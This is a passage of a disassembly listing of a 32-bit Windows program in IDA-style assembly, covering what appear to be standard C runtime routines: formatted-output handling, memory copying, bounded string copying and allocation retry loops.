		jnz	short loc_407606
		cmp	edi, esi
		jnz	short loc_407606
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	ebx
		push	off_424FA0
		call	sub_405753
		pop	ecx
		call	eax
		pop	ecx
		pop	ecx

loc_407606:				; CODE XREF: sub_406F97+654j
					; sub_406F97+658j
		cmp	byte ptr [ebx],	2Dh
		jnz	short loc_407616
		or	[ebp+1F8h+var_210], 100h
		inc	ebx
		mov	[ebp+1F8h+var_21C], ebx

loc_407616:				; CODE XREF: sub_406F97+672j
		push	ebx
		jmp	loc_40748E
; ---------------------------------------------------------------------------

loc_40761C:				; CODE XREF: sub_406F97+50Bj
		mov	[ebp+1F8h+var_218], 8

loc_407623:				; CODE XREF: sub_406F97+44Dj
		mov	[ebp+1F8h+var_244], ecx
		jmp	short loc_407649
; ---------------------------------------------------------------------------

loc_407628:				; CODE XREF: sub_406F97+505j
		sub	eax, 73h
		jz	loc_4073A1
		dec	eax
		dec	eax
		jz	loc_40751C
		sub	eax, 3
		jnz	loc_40779C
		mov	[ebp+1F8h+var_244], 27h

loc_407649:				; CODE XREF: sub_406F97+68Fj
		test	byte ptr [ebp+1F8h+var_210], 80h
		mov	[ebp+1F8h+var_220], 10h
		jz	loc_407523
		mov	al, byte ptr [ebp+1F8h+var_244]
		add	al, 51h
		mov	[ebp+1F8h+var_230], 30h
		mov	[ebp+1F8h+var_22F], al
		mov	[ebp+1F8h+var_234], 2
		jmp	loc_407523
; ---------------------------------------------------------------------------

loc_407672:				; CODE XREF: sub_406F97+592j
		test	cx, 1000h
		jnz	loc_40752F
		add	edi, 4
		test	cl, 20h
		jz	short loc_40769A
		test	cl, 40h
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407693
		movsx	eax, word ptr [edi-4]
		jmp	short loc_407697
; ---------------------------------------------------------------------------

loc_407693:				; CODE XREF: sub_406F97+6F4j
		movzx	eax, word ptr [edi-4]

loc_407697:				; CODE XREF: sub_406F97+6FAj
		cdq
		jmp	short loc_4076AA
; ---------------------------------------------------------------------------

loc_40769A:				; CODE XREF: sub_406F97+6ECj
		test	cl, 40h
		mov	eax, [edi-4]
		jz	short loc_4076A5
		cdq
		jmp	short loc_4076A7
; ---------------------------------------------------------------------------

loc_4076A5:				; CODE XREF: sub_406F97+709j
		xor	edx, edx

loc_4076A7:				; CODE XREF: sub_406F97+5A0j
					; sub_406F97+70Cj
		mov	[ebp+1F8h+var_224], edi

loc_4076AA:				; CODE XREF: sub_406F97+701j
		test	cl, 40h
		jz	short loc_4076C7
		cmp	edx, esi
		jg	short loc_4076C7
		jl	short loc_4076B9
		cmp	eax, esi
		jnb	short loc_4076C7

loc_4076B9:				; CODE XREF: sub_406F97+71Cj
		neg	eax
		adc	edx, 0
		neg	edx
		or	[ebp+1F8h+var_210], 100h

loc_4076C7:				; CODE XREF: sub_406F97+716j
					; sub_406F97+71Aj ...
		test	word ptr [ebp+1F8h+var_210], 9000h
		mov	ebx, edx
		mov	edi, eax
		jnz	short loc_4076D5
		xor	ebx, ebx

loc_4076D5:				; CODE XREF: sub_406F97+73Aj
		cmp	[ebp+1F8h+var_218], 0
		jge	short loc_4076E4
		mov	[ebp+1F8h+var_218], 1
		jmp	short loc_4076F5
; ---------------------------------------------------------------------------

loc_4076E4:				; CODE XREF: sub_406F97+742j
		and	[ebp+1F8h+var_210], 0FFFFFFF7h
		mov	eax, 200h
		cmp	[ebp+1F8h+var_218], eax
		jle	short loc_4076F5
		mov	[ebp+1F8h+var_218], eax

loc_4076F5:				; CODE XREF: sub_406F97+74Bj
					; sub_406F97+759j
		mov	eax, edi
		or	eax, ebx
		jnz	short loc_4076FF
		and	[ebp+1F8h+var_234], 0

loc_4076FF:				; CODE XREF: sub_406F97+762j
		lea	esi, [ebp+1F8h+var_D]

loc_407705:				; CODE XREF: sub_406F97+7A0j
		mov	eax, [ebp+1F8h+var_218]
		dec	[ebp+1F8h+var_218]
		test	eax, eax
		jg	short loc_407715
		mov	eax, edi
		or	eax, ebx
		jz	short loc_407739

loc_407715:				; CODE XREF: sub_406F97+776j
		mov	eax, [ebp+1F8h+var_220]
		cdq
		push	edx
		push	eax
		push	ebx
		push	edi
		call	sub_40DD10
		add	ecx, 30h
		cmp	ecx, 39h
		mov	[ebp+1F8h+var_260], ebx
		mov	edi, eax
		mov	ebx, edx
		jle	short loc_407734
		add	ecx, [ebp+1F8h+var_244]

loc_407734:				; CODE XREF: sub_406F97+798j
		mov	[esi], cl
		dec	esi
		jmp	short loc_407705
; ---------------------------------------------------------------------------

loc_407739:				; CODE XREF: sub_406F97+77Cj
		lea	eax, [ebp+1F8h+var_D]
		sub	eax, esi
		inc	esi
		test	word ptr [ebp+1F8h+var_210], 200h
		mov	[ebp+1F8h+var_220], eax
		mov	[ebp+1F8h+var_21C], esi
		jz	short loc_40779C
		test	eax, eax
		jz	short loc_40775B
		mov	ecx, esi
		cmp	byte ptr [ecx],	30h
		jz	short loc_40779C

loc_40775B:				; CODE XREF: sub_406F97+7BBj
		dec	[ebp+1F8h+var_21C]
		mov	ecx, [ebp+1F8h+var_21C]
		mov	byte ptr [ecx],	30h
		inc	eax
		jmp	short loc_407799
; ---------------------------------------------------------------------------

loc_407767:				; CODE XREF: sub_406F97+7DAj
		dec	ecx
		cmp	[eax], si
		jz	short loc_407773
		inc	eax
		inc	eax

loc_40776F:				; CODE XREF: sub_406F97+445j
		cmp	ecx, esi
		jnz	short loc_407767

loc_407773:				; CODE XREF: sub_406F97+7D4j
		sub	eax, [ebp+1F8h+var_21C]
		sar	eax, 1
		jmp	short loc_407799
; ---------------------------------------------------------------------------

loc_40777A:				; CODE XREF: sub_406F97+429j
		cmp	edi, esi
		jnz	short loc_407786
		mov	eax, off_424924
		mov	[ebp+1F8h+var_21C], eax

loc_407786:				; CODE XREF: sub_406F97+7E5j
		mov	eax, [ebp+1F8h+var_21C]
		jmp	short loc_407792
; ---------------------------------------------------------------------------

loc_40778B:				; CODE XREF: sub_406F97+7FDj
		dec	ecx
		cmp	byte ptr [eax],	0
		jz	short loc_407796
		inc	eax

loc_407792:				; CODE XREF: sub_406F97+7F2j
		cmp	ecx, esi
		jnz	short loc_40778B

loc_407796:				; CODE XREF: sub_406F97+7F8j
		sub	eax, [ebp+1F8h+var_21C]

loc_407799:				; CODE XREF: sub_406F97+4E1j
					; sub_406F97+4E9j ...
		mov	[ebp+1F8h+var_220], eax

loc_40779C:				; CODE XREF: sub_406F97+3B0j
					; sub_406F97+461j ...
		cmp	[ebp+1F8h+var_248], 0
		jnz	loc_4078A1
		mov	eax, [ebp+1F8h+var_210]
		test	al, 40h
		jz	short loc_4077D2
		test	ax, 100h
		jz	short loc_4077B9
		mov	[ebp+1F8h+var_230], 2Dh
		jmp	short loc_4077CB
; ---------------------------------------------------------------------------

loc_4077B9:				; CODE XREF: sub_406F97+81Aj
		test	al, 1
		jz	short loc_4077C3
		mov	[ebp+1F8h+var_230], 2Bh
		jmp	short loc_4077CB
; ---------------------------------------------------------------------------

loc_4077C3:				; CODE XREF: sub_406F97+824j
		test	al, 2
		jz	short loc_4077D2
		mov	[ebp+1F8h+var_230], 20h

loc_4077CB:				; CODE XREF: sub_406F97+820j
					; sub_406F97+82Aj
		mov	[ebp+1F8h+var_234], 1

loc_4077D2:				; CODE XREF: sub_406F97+814j
					; sub_406F97+82Ej
		mov	ebx, [ebp+1F8h+var_238]
		sub	ebx, [ebp+1F8h+var_220]
		sub	ebx, [ebp+1F8h+var_234]
		test	byte ptr [ebp+1F8h+var_210], 0Ch
		jnz	short loc_4077F2
		push	[ebp+1F8h+var_228]
		lea	eax, [ebp+1F8h+var_22C]
		push	ebx
		push	20h
		call	sub_406F29
		add	esp, 0Ch

loc_4077F2:				; CODE XREF: sub_406F97+848j
		push	[ebp+1F8h+var_234]
		mov	edi, [ebp+1F8h+var_228]
		lea	eax, [ebp+1F8h+var_22C]
		lea	ecx, [ebp+1F8h+var_230]
		call	sub_406F4D
		test	byte ptr [ebp+1F8h+var_210], 8
		pop	ecx
		jz	short loc_40781F
		test	byte ptr [ebp+1F8h+var_210], 4
		jnz	short loc_40781F
		push	edi
		push	ebx
		push	30h
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406F29
		add	esp, 0Ch

loc_40781F:				; CODE XREF: sub_406F97+871j
					; sub_406F97+877j
		cmp	[ebp+1F8h+var_23C], 0
		mov	eax, [ebp+1F8h+var_220]
		jz	short loc_407879
		test	eax, eax
		jle	short loc_407879
		mov	esi, [ebp+1F8h+var_21C]
		mov	[ebp+1F8h+var_260], eax

loc_407832:				; CODE XREF: sub_406F97+8D8j
		movzx	eax, word ptr [esi]
		dec	[ebp+1F8h+var_260]
		push	eax
		push	6
		lea	eax, [ebp+1F8h+var_C]
		push	eax
		lea	eax, [ebp+1F8h+var_268]
		inc	esi
		push	eax
		inc	esi
		call	sub_40DCF2
		add	esp, 10h
		test	eax, eax
		jnz	short loc_407873
		cmp	[ebp+1F8h+var_268], eax
		jz	short loc_407873
		push	[ebp+1F8h+var_268]
		lea	eax, [ebp+1F8h+var_22C]
		lea	ecx, [ebp+1F8h+var_C]
		call	sub_406F4D
		cmp	[ebp+1F8h+var_260], 0
		pop	ecx
		jnz	short loc_407832
		jmp	short loc_407886
; ---------------------------------------------------------------------------

loc_407873:				; CODE XREF: sub_406F97+8BBj
					; sub_406F97+8C0j
		or	[ebp+1F8h+var_22C], 0FFFFFFFFh
		jmp	short loc_407886
; ---------------------------------------------------------------------------

loc_407879:				; CODE XREF: sub_406F97+88Fj
					; sub_406F97+893j
		mov	ecx, [ebp+1F8h+var_21C]
		push	eax
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406F4D
		pop	ecx

loc_407886:				; CODE XREF: sub_406F97+8DAj
					; sub_406F97+8E0j
		cmp	[ebp+1F8h+var_22C], 0
		jl	short loc_4078A1
		test	byte ptr [ebp+1F8h+var_210], 4
		jz	short loc_4078A1
		push	edi
		push	ebx
		push	20h
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406F29
		add	esp, 0Ch

loc_4078A1:				; CODE XREF: sub_406F97+57Cj
					; sub_406F97+809j ...
		cmp	[ebp+1F8h+var_24C], 0
		jz	short loc_4078B4 ; default
		push	[ebp+1F8h+var_24C]
		call	sub_403B91
		and	[ebp+1F8h+var_24C], 0
		pop	ecx

loc_4078B4:				; CODE XREF: sub_406F97+19Cj
					; sub_406F97+1BFj ...
		mov	ebx, [ebp+1F8h+var_240]	; default
		mov	al, [ebx]
		test	al, al
		mov	[ebp+1F8h+var_211], al
		jz	short loc_4078E4
		mov	ecx, [ebp+1F8h+var_26C]
		mov	edi, [ebp+1F8h+var_224]
		mov	dl, al
		jmp	loc_4070F5
; ---------------------------------------------------------------------------

loc_4078CD:				; CODE XREF: sub_406F97+36Ej
					; sub_406F97+55Bj
		call	sub_405D93
		mov	dword ptr [eax], 16h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		jmp	loc_407007
; ---------------------------------------------------------------------------

loc_4078E4:				; CODE XREF: sub_406F97+158j
					; sub_406F97+166j ...
		cmp	[ebp+1F8h+var_250], 0
		jz	short loc_4078F1
		mov	eax, [ebp+1F8h+var_254]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4078F1:				; CODE XREF: sub_406F97+951j
		mov	eax, [ebp+1F8h+var_22C]

loc_4078F4:				; CODE XREF: sub_406F97+88j
		mov	ecx, [ebp+1F8h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 1F8h
		leave
		retn
sub_406F97	endp

; ---------------------------------------------------------------------------
		db 8Dh,	49h, 0
off_40790F	dd offset loc_4072D9	; DATA XREF: sub_406F97+1A2r
		dd offset loc_407140	; jump table for switch	statement
		dd offset loc_40715B
		dd offset loc_4071AA
		dd offset loc_4071E4
		dd offset loc_4071EC
		dd offset loc_407223
		dd offset loc_40731B
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_407930	proc near		; CODE XREF: sub_40312E+4Dp
					; sub_406110+2DAp ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	esi, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		mov	edi, [ebp+arg_0]
		mov	eax, ecx
		mov	edx, ecx
		add	eax, esi
		cmp	edi, esi
		jbe	short loc_407950
		cmp	edi, eax
		jb	loc_407AF4

loc_407950:				; CODE XREF: sub_407930+16j
		cmp	ecx, 100h
		jb	short loc_407977
		cmp	dword_4376DC, 0
		jz	short loc_407977
		push	edi
		push	esi
		and	edi, 0Fh
		and	esi, 0Fh
		cmp	edi, esi
		pop	esi
		pop	edi
		jnz	short loc_407977
		pop	esi
		pop	edi
		pop	ebp
		jmp	sub_40DE2C
; ---------------------------------------------------------------------------

loc_407977:				; CODE XREF: sub_407930+26j
					; sub_407930+2Fj ...
		test	edi, 3
		jnz	short loc_407994
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407994:				; CODE XREF: sub_407930+4Dj
		mov	eax, edi
		mov	edx, 3
		sub	ecx, 4
		jb	short loc_4079AC
		and	eax, 3
		add	ecx, eax
		jmp	dword ptr ds:loc_4079B4+4[eax*4]
; ---------------------------------------------------------------------------

loc_4079AC:				; CODE XREF: sub_407930+6Ej
		jmp	dword ptr ds:loc_407AB4[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4079B4:				; CODE XREF: sub_407930+58j
					; sub_407930+B6j ...
		jmp	ds:off_407A38[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_4079C8
		dd offset loc_4079F4
		dd offset loc_407A18
; ---------------------------------------------------------------------------

loc_4079C8:				; DATA XREF: sub_407930+8Co
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		add	esi, 3
		add	edi, 3
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4079F4:				; DATA XREF: sub_407930+90o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		add	esi, 2
		add	edi, 2
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407A18:				; DATA XREF: sub_407930+94o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		add	esi, 1
		shr	ecx, 2
		add	edi, 1
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_407A38	dd offset loc_407A9B	; DATA XREF: sub_407930:loc_4079B4r
		dd offset loc_407A88
		dd offset loc_407A80
		dd offset loc_407A78
		dd offset loc_407A70
		dd offset loc_407A68
		dd offset loc_407A60
		dd offset loc_407A58
; ---------------------------------------------------------------------------

loc_407A58:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+124o
		mov	eax, [esi+ecx*4-1Ch]
		mov	[edi+ecx*4-1Ch], eax

loc_407A60:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+120o
		mov	eax, [esi+ecx*4-18h]
		mov	[edi+ecx*4-18h], eax

loc_407A68:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+11Co
		mov	eax, [esi+ecx*4-14h]
		mov	[edi+ecx*4-14h], eax

loc_407A70:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+118o
		mov	eax, [esi+ecx*4-10h]
		mov	[edi+ecx*4-10h], eax

loc_407A78:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+114o
		mov	eax, [esi+ecx*4-0Ch]
		mov	[edi+ecx*4-0Ch], eax

loc_407A80:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+110o
		mov	eax, [esi+ecx*4-8]
		mov	[edi+ecx*4-8], eax

loc_407A88:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+10Co
		mov	eax, [esi+ecx*4-4]
		mov	[edi+ecx*4-4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_407A9B:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930:off_407A38o
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_407AA4	dd offset loc_407AB4	; DATA XREF: sub_407930+5Cr
					; sub_407930+BAr ...
		dd offset loc_407ABC
		dd offset loc_407AC8
		dd offset loc_407ADC
; ---------------------------------------------------------------------------

loc_407AB4:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407ABC:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407AC8:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407ADC:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407AF4:				; CODE XREF: sub_407930+1Aj
		lea	esi, [ecx+esi-4]
		lea	edi, [ecx+edi-4]
		test	edi, 3
		jnz	short loc_407B28
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407B1C:				; CODE XREF: sub_407930+1DDj
					; sub_407930+238j ...
		neg	ecx
		jmp	ds:off_407BF0[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407B28:				; CODE XREF: sub_407930+1D2j
		mov	eax, edi
		mov	edx, 3
		cmp	ecx, 4
		jb	short loc_407B40
		and	eax, 3
		sub	ecx, eax
		jmp	dword ptr ds:loc_407B40+4[eax*4]
; ---------------------------------------------------------------------------

loc_407B40:				; CODE XREF: sub_407930+202j
					; DATA XREF: sub_407930+209r
		jmp	ds:off_407C40[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_407B54
		dd offset loc_407B78
		dd offset loc_407BA0
; ---------------------------------------------------------------------------

loc_407B54:				; DATA XREF: sub_407930+218o
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		sub	esi, 1
		shr	ecx, 2
		sub	edi, 1
		cmp	ecx, 8
		jb	short loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407B78:				; DATA XREF: sub_407930+21Co
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		sub	esi, 2
		sub	edi, 2
		cmp	ecx, 8
		jb	short loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 10h

loc_407BA0:				; DATA XREF: sub_407930+220o
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		sub	esi, 3
		sub	edi, 3
		cmp	ecx, 8
		jb	loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_407BF4
		dd offset loc_407BFC
		dd offset loc_407C04
		dd offset loc_407C0C
		dd offset loc_407C14
		dd offset loc_407C1C
		dd offset loc_407C24
off_407BF0	dd offset loc_407C37	; DATA XREF: sub_407930+1EEr
; ---------------------------------------------------------------------------

loc_407BF4:				; DATA XREF: sub_407930+2A4o
		mov	eax, [esi+ecx*4+1Ch]
		mov	[edi+ecx*4+1Ch], eax

loc_407BFC:				; DATA XREF: sub_407930+2A8o
		mov	eax, [esi+ecx*4+18h]
		mov	[edi+ecx*4+18h], eax

loc_407C04:				; DATA XREF: sub_407930+2ACo
		mov	eax, [esi+ecx*4+14h]
		mov	[edi+ecx*4+14h], eax

loc_407C0C:				; DATA XREF: sub_407930+2B0o
		mov	eax, [esi+ecx*4+10h]
		mov	[edi+ecx*4+10h], eax

loc_407C14:				; DATA XREF: sub_407930+2B4o
		mov	eax, [esi+ecx*4+0Ch]
		mov	[edi+ecx*4+0Ch], eax

loc_407C1C:				; DATA XREF: sub_407930+2B8o
		mov	eax, [esi+ecx*4+8]
		mov	[edi+ecx*4+8], eax

loc_407C24:				; DATA XREF: sub_407930+2BCo
		mov	eax, [esi+ecx*4+4]
		mov	[edi+ecx*4+4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_407C37:				; CODE XREF: sub_407930+1EEj
					; DATA XREF: sub_407930:off_407BF0o
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 10h
off_407C40	dd offset loc_407C50	; DATA XREF: sub_407930+1E3r
					; sub_407930:loc_407B40r ...
		dd offset loc_407C58
		dd offset loc_407C68
		dd offset loc_407C7C
; ---------------------------------------------------------------------------

loc_407C50:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407C58:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407C68:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407C7C:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
sub_407930	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C95	proc near		; CODE XREF: sub_40319A+31p
					; sub_403200+3Dp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	ecx, ebx
		push	esi
		push	edi
		jz	short loc_407CAA
		mov	edi, [esp+0Ch+arg_4]
		cmp	edi, ebx
		ja	short loc_407CC5

loc_407CAA:				; CODE XREF: sub_407C95+Bj
					; sub_407C95+3Aj
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_407CB4:				; CODE XREF: sub_407C95+5Dj
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_407CF6
; ---------------------------------------------------------------------------

loc_407CC5:				; CODE XREF: sub_407C95+13j
		mov	esi, [esp+0Ch+arg_8]
		cmp	esi, ebx
		jnz	short loc_407CD1
		mov	[ecx], bl
		jmp	short loc_407CAA
; ---------------------------------------------------------------------------

loc_407CD1:				; CODE XREF: sub_407C95+36j
		mov	edx, ecx

loc_407CD3:				; CODE XREF: sub_407C95+49j
		mov	al, [esi]
		mov	[edx], al
		inc	edx
		inc	esi
		cmp	al, bl
		jz	short loc_407CE0
		dec	edi
		jnz	short loc_407CD3

loc_407CE0:				; CODE XREF: sub_407C95+46j
		cmp	edi, ebx
		jnz	short loc_407CF4
		mov	[ecx], bl
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_407CB4
; ---------------------------------------------------------------------------

loc_407CF4:				; CODE XREF: sub_407C95+4Dj
		xor	eax, eax

loc_407CF6:				; CODE XREF: sub_407C95+2Ej
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_407C95	endp


; =============== S U B	R O U T	I N E =======================================



sub_407CFA	proc near		; CODE XREF: sub_405229+3Bp
					; sub_405EF4+48p ...

arg_0		= dword	ptr  4

		push	esi
		push	edi
		xor	esi, esi

loc_407CFE:				; CODE XREF: sub_407CFA+39j
		push	[esp+8+arg_0]
		call	sub_403C6E
		mov	edi, eax
		test	edi, edi
		pop	ecx
		jnz	short loc_407D35
		cmp	dword_4282D0, eax
		jbe	short loc_407D35
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4282D0
		jbe	short loc_407D2E
		or	eax, 0FFFFFFFFh

loc_407D2E:				; CODE XREF: sub_407CFA+2Fj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407CFE

loc_407D35:				; CODE XREF: sub_407CFA+12j
					; sub_407CFA+1Aj
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407CFA	endp


; =============== S U B	R O U T	I N E =======================================



sub_407D3A	proc near		; CODE XREF: sub_403344+5p
					; sub_4058DA+30p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		push	edi
		xor	esi, esi

loc_407D3E:				; CODE XREF: sub_407D3A+41j
		push	0
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40DF0F
		mov	edi, eax
		add	esp, 0Ch
		test	edi, edi
		jnz	short loc_407D7D
		cmp	dword_4282D0, eax
		jbe	short loc_407D7D
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4282D0
		jbe	short loc_407D76
		or	eax, 0FFFFFFFFh

loc_407D76:				; CODE XREF: sub_407D3A+37j
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407D3E

loc_407D7D:				; CODE XREF: sub_407D3A+1Aj
					; sub_407D3A+22j
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407D3A	endp


; =============== S U B	R O U T	I N E =======================================



sub_407D82	proc near		; CODE XREF: sub_403297+58p
					; sub_403297+6Fp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		push	edi
		xor	esi, esi

loc_407D86:				; CODE XREF: sub_407D82+44j
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40E02D
		mov	edi, eax
		test	edi, edi
		pop	ecx
		pop	ecx
		jnz	short loc_407DC8
		cmp	[esp+8+arg_4], eax
		jz	short loc_407DC8
		cmp	dword_4282D0, eax
		jbe	short loc_407DC8
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4282D0
		jbe	short loc_407DC1
		or	eax, 0FFFFFFFFh

loc_407DC1:				; CODE XREF: sub_407D82+3Aj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407D86

loc_407DC8:				; CODE XREF: sub_407D82+17j
					; sub_407D82+1Dj ...
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407D82	endp


; =============== S U B	R O U T	I N E =======================================



sub_407DCD	proc near		; CODE XREF: sub_409398+40p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		push	edi
		xor	esi, esi

loc_407DD1:				; CODE XREF: sub_407DCD+49j
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40E248
		mov	edi, eax
		add	esp, 0Ch
		test	edi, edi
		jnz	short loc_407E18
		cmp	[esp+8+arg_8], eax
		jz	short loc_407E18
		cmp	dword_4282D0, eax
		jbe	short loc_407E18
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_4282D0
		jbe	short loc_407E11
		or	eax, 0FFFFFFFFh

loc_407E11:				; CODE XREF: sub_407DCD+3Fj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407DD1

loc_407E18:				; CODE XREF: sub_407DCD+1Cj
					; sub_407DCD+22j ...
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407DCD	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E1D	proc near		; CODE XREF: .text:00404609p
					; .text:0040462Fp ...

arg_0		= dword	ptr  4

		call	sub_40A214
		push	[esp+arg_0]
		call	sub_40A074
		push	off_424930
		call	sub_405753
		push	0FFh
		call	eax
		add	esp, 0Ch
		retn
sub_407E1D	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E41	proc near		; CODE XREF: sub_407E67+4p

arg_0		= dword	ptr  4

		push	offset aMscoree_dll ; "mscoree.dll"
